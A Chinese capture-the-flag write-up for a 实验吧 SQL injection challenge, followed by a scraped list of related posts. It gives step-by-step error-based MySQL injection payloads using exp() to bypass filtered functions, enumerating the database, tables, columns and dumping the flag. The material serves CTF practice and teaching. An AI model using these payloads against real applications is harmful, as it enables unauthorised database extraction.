题目提示是报错注入,于是就用盲注技巧来注入。

这里注入时发现floor,extractvalue,updatexml被吃掉了,用exp可以注入成功。(记住大小写绕过等技巧)

1.爆库

' or exp(~(select * from(select database())a))#
这里最后面的a处可为别的字母,且必须要有

可以看到库名为web1。

2,爆表

' or exp(~(select * from(select group_concat(table_name) from information_schema.tables where table_schema=database())a))#
或者
' or exp(~(select * from(select group_concat(table_name) from information_schema.tables where table_schema='web1')a))#

flag应该在表flag中。

3.爆列名

' or exp(~(select * from(select group_concat(column_name) from information_schema.columns where table_name='flag')a))#

我们要的列名出来了

4.爆内容

' or exp(~(select * from(select flag from flag)a))#

就拿到flag了。

这篇文章可做参考:https://www.cnblogs.com/caizhiren/p/7846917.html

转载于:https://www.cnblogs.com/RenoStudio/p/10355128.html

实验吧Web-易-简单的sql注入之3(报错的sql盲注之exp)相关推荐

  1. sql注入 1-1_基于报错的注入

    sql注入 1-1_ 基于报错注入 1.判断是否存在报错注入 通过 id =1 可以看到服务器返回正常页面 通过 id=1 and 1=1 通过 id=1 and 1=2 服务器也返回正常 通过 id ...

  2. SQL注入之floor报错注入

    SQL注入之floor报错注入 原理 一.count()函数.group by 二.floor()函数 三.rand()函数 四.报错初体验 五.报错注入 1.获取当前数据库 2.获取当前用户 六.靶 ...

  3. SQL注入之Mysql报错注入

    --志向和热爱是伟大行为的双翼. 昨天偷懒了没学什么东西,先自我反省一下 - -. 今天认真的学习了一下Mysql报错注入利用方法及原理,好久之前就像认真的学一下这个了,是在上海市大学生网络安全大赛中 ...

  4. SQL注入攻击(SQL注入(SQLi)攻击)-报错注入

    页面没有显示位 , 但有数据库的报错信息时 , 可使用报错注入 报错注入是最常用的注入方式 , 也是使用起来最方便(我觉得)的一种注入方式 updatexml(1,'~',3); 第二个参数包含特殊字 ...

  5. SQL 注入漏洞(六)布尔型盲注

    一.代码分析 在页面中不会显示数据库信息,一般情况下只会显示对与错的内容. 接收 id 的值,直接带入查询,如果存在即返回 users is exists in the database,否则显示 u ...

  6. SQL注入漏洞测试(报错盲注)笔记

    这个是今天拿下的靶场,这是我作为小白学习的第二个靶场,做一下笔记 已知IP地址为:219.153.49.228,端口号为41280,访问了之后是下面的页面 看到这个页面之后,我进入了后台,查看之后知道 ...

  7. SQL注入语法类型——报错注入

    select extractvalue(1,concat(ox7e,(select user()),0x7e)) 转载于:https://www.cnblogs.com/blogs-1024/p/11 ...

  8. SQL注入中的报错注入,updatexml(1,concat(0x7e,database(),0x7e),1)

    (此文章是记录本人对知识理解的随手笔记,内容不肯定百分百正确,如有错误望指出并谅解) 先看一个通俗易懂的例子: select updatexml("abc","//div ...

  9. SQL注入天书笔记(1)布尔盲注

    前言

  10. 报错型sql注入原理分析

    0x00:前言 关于sql注入,经久不衰,现在的网站一般对sql注入的防护也相对加强了,2016年的***测试报告中,出现最多的是xss(跨站脚本***)和明文传输等,但是对sql注入的利用方式,也相 ...

最新文章

  1. 洛谷精选 - 字符串合集
  2. C语言 结构体里的元素前面有一点“.”代表什么意思?
  3. ISE 14.7安装教程
  4. Linux安装weblogic方式,Linux下weblogic安装图解
  5. Spring AOP基础—JDK动态代理
  6. 系统架构设计师考试4
  7. web安全---XSS漏洞之标签使用2
  8. php如何打开图片的权限,php如何控制用户对图片的访问 PHP禁止图片盗链 php技巧...
  9. bcache使用教程
  10. mysql 有索引 不被使用方法_MySQL教程100-索引在什么情况下不会被使用?
  11. 深度学习(三十九)可视化理解卷积神经网络(2.0)
  12. js 取get过来的数据
  13. mybatis里面返回list集合
  14. QQ输入法 for iPhone2.3
  15. css中怎么改变图片尺寸,CSS也可以改变图片幅面尺寸
  16. HP M1136打印机 Mac驱动程序分享
  17. Manjaro 安装 IC617
  18. 主板后置音频接口图解_图解主板前置音频线接法(一)
  19. asp.net前端页面上使用if
  20. 三星计算机用户的密码忘了,三星平板电脑忘记开机密码解决方法

热门文章

  1. 8.4完成服务(Completion Services)
  2. 7.4读写锁(ReadWriteLock)
  3. 2.同步(Synchronization)
  4. 网站安全之为Web项目添加验证码功能(二)
  5. JSP的自定义标签(二)之带属性的标签
  6. idea中mapper.xml的头文件配置
  7. 【sklearn第十四讲】决策树之分类篇
  8. 牛客小白月赛6 A 鲲
  9. [转]Fedora用root登录
  10. AWS 创建 pem 文件